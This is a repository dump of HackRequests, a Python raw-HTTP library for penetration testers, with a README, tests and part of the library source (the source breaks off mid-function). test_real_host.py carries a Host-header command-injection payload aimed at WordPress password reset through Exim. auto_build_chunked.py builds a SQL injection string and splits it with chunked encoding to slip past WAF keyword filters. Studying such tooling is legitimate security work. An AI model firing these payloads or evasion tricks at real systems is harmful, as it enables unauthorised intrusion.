├── tests ├── __init__.py ├── test_http_raw_pool.py ├── test_http.py ├── test_real_host.py ├── auto_build_chunked.py └── test_http_raw.py ├── docs └── History.md ├── HackRequests ├── __init__.py └── HackRequests.py ├── makefile ├── setup.py ├── LICENSE ├── .gitignore └── README.md /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /docs/History.md: -------------------------------------------------------------------------------- 1 | [1.2] 2 | - 修复#7 3 | 4 | [1.0] 5 | 6 | 2019年03月09日15:22:13 7 | - httpraw方法重构,支持chunk发包 8 | - 添加测试用例 9 | 10 | [0.3.4] 11 | - 支持host字段自定义,支持真实IP 12 | - 修复header头的"accept */*"问题 13 | 14 | [0.3.0] 15 | - 炒鸡好用的初级版本 -------------------------------------------------------------------------------- /HackRequests/__init__.py: -------------------------------------------------------------------------------- 1 | __title__ = 'HackRequests' 2 | __version__ = '1.2' 3 | __author__ = 'w8ay' 4 | __author_email__ = 'w8ay@qq.com' 5 | __url__ = 'https://github.com/boy-hack/hack-requests/' 6 | __license__ = 'MIT' 7 | __copyright__ = 'Copyright 2019' 8 | 9 | from HackRequests.HackRequests import * -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | SRC_DIR = HackRequests 2 | MAKE = make 3 | 4 | 5 | .PHONY: prebuildclean install build pypimeta pypi publish clean 6 | 7 | 8 | prebuildclean: 9 | @+python -c "import shutil; shutil.rmtree('build', True)" 10 | @+python -c "import shutil; shutil.rmtree('dist', True)" 11 | @+python -c "import shutil; shutil.rmtree('HackRequests.egg-info', True)" 12 | 13 | install: 14 | python3 setup.py install 15 | 16 | build: 17 | @make prebuildclean 18 | python3 setup.py sdist --formats=zip bdist_wheel 19 | 20 | pypimeta: 21 | twine register 22 | 23 | pypi: 24 | twine upload dist/* 25 | 26 | publish: 27 | @make build 28 | #@make pypimeta 29 | @make pypi 30 | 31 | clean: 32 | rm -rf *.egg-info dist build .tox 33 | find $(SRC_DIR) tests -type f -name '*.pyc' -delete -------------------------------------------------------------------------------- /tests/test_http_raw_pool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/4/28 9:16 PM 4 | # @Author : w8ay 5 | # @File : test_http_raw_pool.py 6 | import HackRequests 7 | 8 | 9 | def _callback(r: HackRequests.response): 10 | # 从回调函数取出结果,参数r是response结果 11 | print(len(r.text())) 12 | 13 | 14 | threadpool = HackRequests.threadpool(threadnum=10, callback=_callback, timeout=10) 15 | raw = ''' 16 | GET / HTTP/1.1 17 | Host: x.hacking8.com 18 | Connection: Keep-Alive 19 | Cache-Control: max-age=0 20 | Upgrade-Insecure-Requests: 1 21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 23 | Accept-Encoding: gzip, deflate 24 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 25 | ''' 26 | 27 | for i in range(20): 28 | threadpool.httpraw(raw) 29 | threadpool.run() 30 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | from setuptools import setup 4 | from HackRequests import ( 5 | __title__, __version__, __author__, __url__, 6 | __author_email__, __license__) 7 | setup( 8 | name=__title__, 9 | version=__version__, 10 | description="The hack-requests is an HTTP network library for hackers.", 11 | long_description='''HackRequests is an HTTP network library for hackers. Based on python3.x. If you need a less bulky and like requests design, and provide the request/response package to facilitate your next analysis, if you use the Burp Suite, you can copy and replay the original message directly, and for a large number of HTTP requests, the HackRequests's threadpool can help you implement the quickest response.''', 12 | author=__author__, 13 | author_email=__author_email__, 14 | url=__url__, 15 | license=__license__, 16 | package_data={'HackRequests': ['*.md']}, 17 | package_dir={'HackRequests': 'HackRequests'}, 18 | packages=['HackRequests'], 19 | include_package_data=True, 20 | keywords='http requests hacker', 21 | ) -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 boyhack 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /tests/test_http.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/3/9 2:53 PM 4 | # @Author : w8ay 5 | # @File : test_http.py 6 | import unittest 7 | import HackRequests 8 | import json 9 | 10 | 11 | class TestCase(unittest.TestCase): 12 | def setUp(self): 13 | self.hack = HackRequests.hackRequests() 14 | 15 | def test_get(self): 16 | r = self.hack.http("http://httpbin.org/get?a=1&b=2&c=heloo") 17 | self.assertTrue(json.loads(r.text())["args"] == {"a": "1", "b": "2", "c": "heloo"}) 18 | 19 | def test_post(self): 20 | data = "a=1&b=2&c=heloo" 21 | r = self.hack.http("http://httpbin.org/post", post=data) 22 | self.assertTrue(json.loads(r.text())["form"] == {"a": "1", "b": "2", "c": "heloo"}) 23 | 24 | def test_json(self): 25 | data = '{"hack-requests":"v1.0","author":"w8ay"}' 26 | r = self.hack.http("http://httpbin.org/post", post=data) 27 | self.assertTrue("hack-requests" in r.text()) 28 | 29 | def test_localhost(self): 30 | headers = { 31 | "Referer": "xx", 32 | "referer": "xx" 33 | } 34 | r = self.hack.http("https://x.hacking8.com", headers=headers) 35 | print(r.text()) 36 | -------------------------------------------------------------------------------- /tests/test_real_host.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/3/9 2:22 PM 4 | # @Author : w8ay 5 | # @File : test_real_host.py 6 | import unittest 7 | import HackRequests 8 | 9 | 10 | class TestCase(unittest.TestCase): 11 | def setUp(self): 12 | self.hack = HackRequests.hackRequests() 13 | 14 | def test_real_ip(self): 15 | raw = ''' 16 | POST / HTTP/1.1 17 | Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null) 18 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 19 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 20 | Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 21 | Accept-Encoding: gzip, deflate 22 | Referer: http://172.16.176.128:8000/wp-login.php?action=lostpassword 23 | Cookie: wordpress_test_cookie=WP+Cookie+check 24 | DNT: 1 25 | Connection: close 26 | Upgrade-Insecure-Requests: 1 27 | Content-Type: application/x-www-form-urlencoded 28 | 29 | user_login=admin&redirect_to=&wp-submit=Get+New+Password 30 | ''' 31 | r = self.hack.httpraw(raw, real_host="httpbin.org") 32 | self.assertTrue("405" in r.text()) 33 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | .idea/ 106 | .vscode/ 107 | test.py 108 | .DS_Store 109 | -------------------------------------------------------------------------------- /tests/auto_build_chunked.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/3/9 10:21 PM 4 | # @Author : w8ay 5 | # @File : auto_build_chunked.py 6 | 7 | # 根据payload内容自动生成分块,自动分割关键字 8 | # chunk_size控制到1-9之内,遇到关键词自动切割 9 | import string 10 | 11 | import HackRequests 12 | import random 13 | 14 | 15 | def chunk_data(data, keywords: list): 16 | dl = len(data) 17 | ret = "" 18 | index = 0 19 | while index < dl: 20 | chunk_size = random.randint(1, 9) 21 | if index + chunk_size >= dl: 22 | chunk_size = dl - index 23 | salt = ''.join(random.sample(string.ascii_letters + string.digits, 5)) 24 | while 1: 25 | tmp_chunk = data[index:index + chunk_size] 26 | tmp_bool = True 27 | for k in keywords: 28 | if k in tmp_chunk: 29 | chunk_size -= 1 30 | tmp_bool = False 31 | break 32 | if tmp_bool: 33 | break 34 | index += chunk_size 35 | ret += "{0};{1}\r\n".format(hex(chunk_size)[2:], salt) 36 | ret += "{0}\r\n".format(tmp_chunk) 37 | 38 | ret += "0\r\n\r\n" 39 | return ret 40 | 41 | 42 | payload = "id=-1' and union select user(),2,3,4,5 from table" 43 | keywords = ['and', 'union', 'select', 'user', 'from'] 44 | data = chunk_data(payload, keywords) 45 | 46 | raw = ''' 47 | POST /post HTTP/1.1 48 | Host: httpbin.org 49 | Cache-Control: max-age=0 50 | Upgrade-Insecure-Requests: 1 51 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 52 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 53 | Accept-Encoding: gzip, deflate 54 | Content-Type: application/x-www-form-urlencoded 55 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 56 | Transfer-Encoding: Chunked 57 | 58 | {} 59 | 60 | '''.format(data) 61 | hack = HackRequests.hackRequests() 62 | 63 | r = hack.httpraw(raw) 64 | print(raw) 65 | 66 | print(r.text()) 67 | print(r.log) 68 | -------------------------------------------------------------------------------- /tests/test_http_raw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/3/9 11:22 AM 4 | # @Author : w8ay 5 | # @File : test_http.py 6 | import unittest 7 | import HackRequests 8 | import json 9 | 10 | 11 | class TestCase(unittest.TestCase): 12 | def setUp(self): 13 | self.hack = HackRequests.hackRequests() 14 | 15 | def test_get(self): 16 | raw = ''' 17 | GET /get?a=1&b=2&c=heloo HTTP/1.1 18 | Host: httpbin.org 19 | Connection: keep-alive 20 | Upgrade-Insecure-Requests: 1 21 | User-Agent: celebrate hack-requests 1.0 ! 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 23 | Accept-Encoding: gzip, deflate 24 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 25 | Cookie: _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1 26 | ''' 27 | r = self.hack.httpraw(raw) 28 | self.assertTrue(json.loads(r.text())["args"] == {"a": "1", "b": "2", "c": "heloo"}) 29 | 30 | def test_post(self): 31 | raw = ''' 32 | POST /post HTTP/1.1 33 | Host: httpbin.org 34 | Connection: keep-alive 35 | Upgrade-Insecure-Requests: 1 36 | User-Agent: celebrate hack-requests 1.0 ! 37 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 40 | Cookie: _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1 41 | 42 | a=1&b=2&c=heloo 43 | ''' 44 | r = self.hack.httpraw(raw) 45 | self.assertTrue("a=1&b=2&c=heloo" in r.text()) 46 | 47 | def test_json(self): 48 | raw = ''' 49 | POST /post HTTP/1.1 50 | Host: httpbin.org 51 | Connection: keep-alive 52 | Upgrade-Insecure-Requests: 1 53 | User-Agent: celebrate hack-requests 1.0 ! 54 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 55 | Accept-Encoding: gzip, deflate 56 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 57 | Cookie: _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1 58 | 59 | {"hack-requests":"v1.0","author":"w8ay"} 60 | ''' 61 | r = self.hack.httpraw(raw) 62 | self.assertTrue(json.loads(r.text())["json"] == {"author": "w8ay", "hack-requests": "v1.0"}) 63 | 64 | def test_chunked(self): 65 | raw = ''' 66 | POST /post HTTP/1.1 67 | Host: httpbin.org 68 | Cache-Control: max-age=0 69 | Upgrade-Insecure-Requests: 1 70 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 71 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 72 | Accept-Encoding: gzip, deflate 73 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 74 | Transfer-Encoding: Chunked 75 | 76 | 7;asdasdzxc 77 | hellowo 78 | 7;qq321 79 | rld!hel 80 | 7;asd 81 | loworld 82 | 7;qqq 83 | hellow 84 | 5;88 85 | or ld 86 | 0 87 | 88 | ''' 89 | r = self.hack.httpraw(raw) 90 | print(r.text()) 91 | self.assertTrue("helloworld!helloworld hellowor ld" in r.text()) 92 | 93 | def test_redirect(self): 94 | raw = ''' 95 | GET / HTTP/1.1 96 | Host: www.python.org 97 | Connection: Keep-Alive 98 | Cache-Control: max-age=0 99 | Upgrade-Insecure-Requests: 1 100 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 101 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 102 | Accept-Encoding: gzip, deflate 103 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 104 | ''' 105 | r = self.hack.httpraw(raw) 106 | self.assertEqual(r.status_code, 200) 107 | self.assertIn('class="python home"', r.text()) 108 | 109 | r = self.hack.httpraw(raw, location=False) 110 | self.assertEqual(r.status_code, 301) 111 | self.assertTrue(r.text() == "") 112 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # hack-requests 2 | HackRequests 是基于`Python3.x`的一个给黑客们使用的http底层网络库。如果你需要一个不那么臃肿而且像requests一样优雅的设计,并且提供底层请求包/返回包原文来方便你进行下一步分析,如果你使用Burp Suite,可以将原始报文直接复制重放,对于大量的HTTP请求,hack-requests线程池也能帮你实现最快速的响应。 3 | 4 | - 像requests一样好用的设计 5 | - 提供接口获得底层请求包、返回包原文,方便下一步分析 6 | - 支持发送HTTP原始报文,支持从Burp Suite等抓包软件中重放 7 | - hack-requests是单文件模块,可方便移植到其他项目中。 8 | 9 | ## 安装 10 | - 仅支持python3 11 | - pip install HackRequests 12 | 13 | ## 特征 14 | 15 | ### 不需要关注参数类型 16 | 17 | 在`requests`模块中,为了方便使用,header、cookie、post等信息都是以字典形式传参,但对于黑客来说,常常截获到的是一个文本,手动转换成字典费时费力。但在`HackRequests`中,这些参数你既可以传入一个字典,也可以传入一个文本,程序会自动识别并转换。 18 | 19 | ```python 20 | import HackRequests 21 | 22 | hack = HackRequests.hackRequests() 23 | url = "http://x.hacking8.com" 24 | 25 | header = ''' 26 | Connection: keep-alive 27 | Cache-Control: max-age=0 28 | Upgrade-Insecure-Requests: 1 29 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 30 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 31 | Accept-Encoding: gzip, deflate 32 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 33 | ''' 34 | hh = hack.http(url, headers=header) 35 | print(hh.text()) 36 | 37 | headers = { 38 | "Connection": "keep-alive", 39 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 40 | } 41 | uu = hack.http(url, headers=headers) 42 | print(uu.text()) 43 | 44 | ``` 45 | 46 | ### 提供底层包分析 47 | 48 | `hackRequests`返回结果中带有`log`参数,记录了`request`和`response`,在写扫描器的时候这两个参数参考非常重要。 49 | 50 | ```python 51 | import HackRequests 52 | 53 | hack = HackRequests.hackRequests() 54 | url = "http://x.hacking8.com" 55 | 56 | header = ''' 57 | Connection: keep-alive 58 | Cache-Control: max-age=0 59 | Upgrade-Insecure-Requests: 1 60 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 61 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 62 | Accept-Encoding: gzip, deflate 63 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 64 | ''' 65 | hh = hack.http(url, headers=header) 66 | print(hh.log.get("request")) 67 | print() 68 | print(hh.log.get("response")) 69 | 70 | ``` 71 | 72 | 返回 73 | 74 | ```bash 75 | GET / HTTP/1.1 76 | Host: x.hacking8.com 77 | Connection: Keep-Alive 78 | Cache-Control: max-age=0 79 | Upgrade-Insecure-Requests: 1 80 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 81 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 82 | Accept-Encoding: gzip, deflate 83 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 84 | 85 | HTTP/1.1 200 OK 86 | Server: nginx 87 | Date: Sat, 01 Sep 2018 12:52:35 GMT 88 | Content-Type: text/html 89 | Content-Length: 580 90 | Last-Modified: Thu, 16 Aug 2018 09:50:56 GMT 91 | Connection: keep-alive 92 | ETag: "5b754900-244" 93 | Accept-Ranges: bytes 94 | ``` 95 | 96 | ### BurpSuite 重放 97 | 98 | 支持直接将代理抓包软件中的请求 99 | 100 | ```python 101 | import HackRequests 102 | 103 | hack = HackRequests.hackRequests() 104 | raw = ''' 105 | GET / HTTP/1.1 106 | Host: x.hacking8.com 107 | Connection: Keep-Alive 108 | Cache-Control: max-age=0 109 | Upgrade-Insecure-Requests: 1 110 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 111 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 112 | Accept-Encoding: gzip, deflate 113 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 114 | ''' 115 | hh = hack.httpraw(raw) 116 | print(hh.text()) 117 | ``` 118 | 119 | ### 内置线程池 120 | 121 | 在并发网络访问方面,HackRequests的线程池可以帮助您把网络并发优化到极致。 122 | ```python 123 | import HackRequests 124 | 125 | 126 | def _callback(r:HackRequests.response): 127 | # 从回调函数取出结果,参数r是response结果 128 | print(r.text()) 129 | 130 | 131 | threadpool = HackRequests.threadpool(threadnum=10,callback=_callback) 132 | url = "http://www.baidu.com" 133 | for i in range(50): 134 | threadpool.http(url) 135 | threadpool.run() 136 | ``` 137 | 138 | ### 学习方面 139 | 140 | 代码开源,不到500行代码且中文注释可以帮助你更好的理解该项目思路。 141 | 142 | ## 说明文档 143 | 144 | ### 快速使用 145 | 146 | ```python 147 | import HackRequests 148 | hack = HackRequests.hackRequests() 149 | url = "http://www.baidu.com/index.php" 150 | u = hack.http(url,method="HEAD") 151 | ``` 152 | 153 | 说明:`HEAD`模式可以帮助你更快的检测网页是否存在 154 | 155 | 使用`hack.http()`可以填写下列参数,当然,除了`url`参数外都不是必须的。 156 | 157 | | 参数名 | 参数功能 | 参数类型 | 158 | | ----------- | ------------------------------------------------------------ | -------- | 159 | | url(必须) | 用于传递一个地址 | Str | 160 | | post | post参数用于传递post提交,此参数被选择时,`method`自动变为`POST`,post参数的类型可以为`Str`或者`Dict` | Str/Dict | 161 | | method | 访问模式,目前支持三种 HEAD、GET、POST,默认为GET | Str | 162 | | location | 当状态码为301、302时会自动跳转,默认为True | Bool | 163 | | proxy | 代理,需要传入一个tuple,类似 ('127.0.0.1','8080') | Tuple | 164 | | headers | 自定义HTTP头,可传入字典或原始的请求头 | Str/Dict | 165 | | cookie | 自定义Cookie,可传入字典或原始cookie字符串 | Str/Dict | 166 | | referer | 模拟用户Referer | Str | 167 | | user_agent | 用户请求头,若为空则会模拟一个正常的请求头 | Str | 168 | | real_host | 用于host头注入中在header host字段填写注入语句,这里填写真实地址 如 "127.0.0.1:8000" 具体参考:https://github.com/boy-hack/hack-requests/blob/master/demo/CVE-2016-10033.py | str | 169 | 170 | ### 发送原始响应头 171 | 172 | 使用`hackRequests`中的 `httpraw`方法 173 | 174 | ```python 175 | import HackRequests 176 | 177 | hack = HackRequests.hackRequests() 178 | raw = ''' 179 | GET / HTTP/1.1 180 | Host: x.hacking8.com 181 | Connection: Keep-Alive 182 | Cache-Control: max-age=0 183 | Upgrade-Insecure-Requests: 1 184 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 185 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 186 | Accept-Encoding: gzip, deflate 187 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 188 | ''' 189 | hh = hack.httpraw(raw) 190 | print(hh.text()) 191 | ``` 192 | 193 | | 参数名 | 参数类型 | 参数功能 | 194 | | --------- | -------- | ------------------------------------------------------------ | 195 | | raw(必须) | Str | 原始报文 | 196 | | ssl | Bool | 网站是否是https,默认为False | 197 | | proxy | Tuple | 代理地址 | 198 | | location | Bool | 自动跳转,默认为Ture | 199 | | real_host | str | 用于host头注入中在header host字段填写注入语句,这里填写真实地址 如 "127.0.0.1:8000" 具体参考:https://github.com/boy-hack/hack-requests/blob/master/demo/CVE-2016-10033.py | 200 | 201 | 注:httpraw方法最后会解析格式到`http`方法,所以`http`方法使用的参数这里都可以使用 202 | 203 | ### response 204 | 205 | 可使用如下接口获取`hack.http()`的返回值 206 | 207 | | 接口参数 | 功能 | 返回值类型 | 208 | | ----------- | ------------------------------- | ---------- | 209 | | status_code | 获取返回状态码 | Int | 210 | | content() | 获取返回字节 | Bytes | 211 | | text() | 获取返回文本(会自动转码) | Str | 212 | | header | 返回原始响应头 | Str | 213 | | headers | 返回原始响应头的字典形式 | Dict | 214 | | charset | 获取编码类型 | Str | 215 | | log | 获取底层发送的请求包/返回包 | Dict | 216 | | url | 返回url,若发生跳转则为跳转后的 | Str | 217 | | cookie | 返回请求后的Cookie | Str | 218 | | cookies | 返回请求后的Cookie字典形式 | Dict | 219 | 220 | ### 线程池 221 | 222 | ```python 223 | import HackRequests 224 | 225 | 226 | def _callback(r:HackRequests.response): 227 | # 从回调函数取出结果,参数r是response结果 228 | print(r.text()) 229 | 230 | 231 | threadpool = HackRequests.threadpool(threadnum=10,callback=_callback,timeout=10) 232 | # 可设置http访问的超时时间,不设置则默认为10s。线程数量[threadnum]设置根据自己电脑配置设置,默认为10,值越大线程越多同一秒访问的网站数量也越多。 233 | url = "http://www.baidu.com" 234 | for i in range(50): 235 | threadpool.http(url) 236 | threadpool.run() 237 | ``` 238 | 回调函数参数r是response类,见[说明文档]-[response] 239 | 在声明一个线程池为`threadpool`后,有以下三种方法可以调用 240 | 241 | | 方法名 | 传入参数 | 功能 | 242 | | --------- | ----------------------- | ---------------------------------- | 243 | | http() | 见[说明文档]-[快速使用] | 将HTTP请求后加入现成队列,准备执行 | 244 | | httpraw() | 见[说明文档]-[快速使用] | 将HTTP请求后加入现成队列,准备执行 | 245 | | stop() | | 停止线程池 | 246 | | run() | | 启动线程池 | 247 | 248 | 249 | -------------------------------------------------------------------------------- /HackRequests/HackRequests.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author : w8ay 4 | # @Mail : w8ay@qq.com 5 | # @File : hackRequests.py 6 | 7 | import copy 8 | import gzip 9 | import queue 10 | import socket 11 | import ssl 12 | import threading 13 | import time 14 | import zlib 15 | from http import client 16 | from urllib import parse 17 | 18 | 19 | class HackError(Exception): 20 | def __init__(self, content): 21 | self.content = content 22 | 23 | def __str__(self): 24 | return self.content 25 | 26 | 27 | def extract_dict(text, sep, sep2="="): 28 | """根据分割方式将字符串分割为字典 29 | Args: 30 | text: 分割的文本 31 | sep: 分割的第一个字符 一般为'\n' 32 | sep2: 分割的第二个字符,默认为'=' 33 | Return: 34 | 返回一个dict类型,key为sep2的第0个位置,value为sep2的第一个位置 35 | 36 | 只能将文本转换为字典,若text为其他类型则会出错 37 | """ 38 | _dict = dict([l.split(sep2, 1) for l in text.split(sep)]) 39 | return _dict 40 | 41 | 42 | class httpcon(object): 43 | ''' 44 | httpcon用于生成HTTP中的连接。 45 | 46 | Attributes: 47 | timeout: 超时时间 48 | ''' 49 | 50 | def __init__(self, timeout=10): 51 | self.timeout = timeout 52 | self.protocol = [] 53 | self._get_protocol() 54 | 55 | def _get_protocol(self): 56 | if not self.protocol: 57 | ps = ( 58 | 'PROTOCOL_SSLv23', 'PROTOCOL_TLSv1', 59 | 'PROTOCOL_SSLv2', 'PROTOCOL_TLSv1_1', 'PROTOCOL_TLSv1_2') 60 | for p in ps: 61 | pa = getattr(ssl, p, None) 62 | if pa: 63 | self.protocol.append(pa) 64 | 65 | ''' 66 | 得到一个连接 67 | 68 | 这是连接池中最重要的一个参数,连接生成、复用相关操作都在这 69 | ''' 70 | 71 | def get_con(self, url, proxy=None): 72 | scheme, host, port, path = url 73 | conn = self._make_con(scheme, host, port, proxy) 74 | return conn 75 | 76 | def _make_con(self, scheme, host, port, proxy=None): 77 | if "https" != scheme: 78 | if proxy: 79 | con = client.HTTPConnection( 80 | proxy[0], int(proxy[1]), timeout=self.timeout) 81 | con.set_tunnel(host, port) 82 | else: 83 | con = client.HTTPConnection(host, port, timeout=self.timeout) 84 | # con.connect() 85 | return con 86 | for p in self.protocol: 87 | context = ssl._create_unverified_context(p) 88 | try: 89 | if proxy: 90 | con = client.HTTPSConnection( 91 | proxy[0], proxy[1], context=context, 92 | timeout=self.timeout) 93 | con.set_tunnel(host, port) 94 | else: 95 | con = client.HTTPSConnection( 96 | host, port, context=context, timeout=self.timeout) 97 | # con.connect() 98 | return con 99 | except ssl.SSLError: 100 | pass 101 | raise Exception('connect err') 102 | 103 | 104 | class hackRequests(object): 105 | ''' 106 | hackRequests是主要http请求函数。 107 | 108 | 可以通过http或者httpraw来访问网络 109 | ''' 110 | 111 | def __init__(self, conpool=None): 112 | self.lock = threading.Lock() 113 | 114 | if conpool is None: 115 | self.httpcon = httpcon(timeout=17) 116 | else: 117 | self.httpcon = conpool 118 | 119 | def _get_urlinfo(self, url, realhost: str): 120 | p = parse.urlparse(url) 121 | scheme = p.scheme.lower() 122 | if scheme != 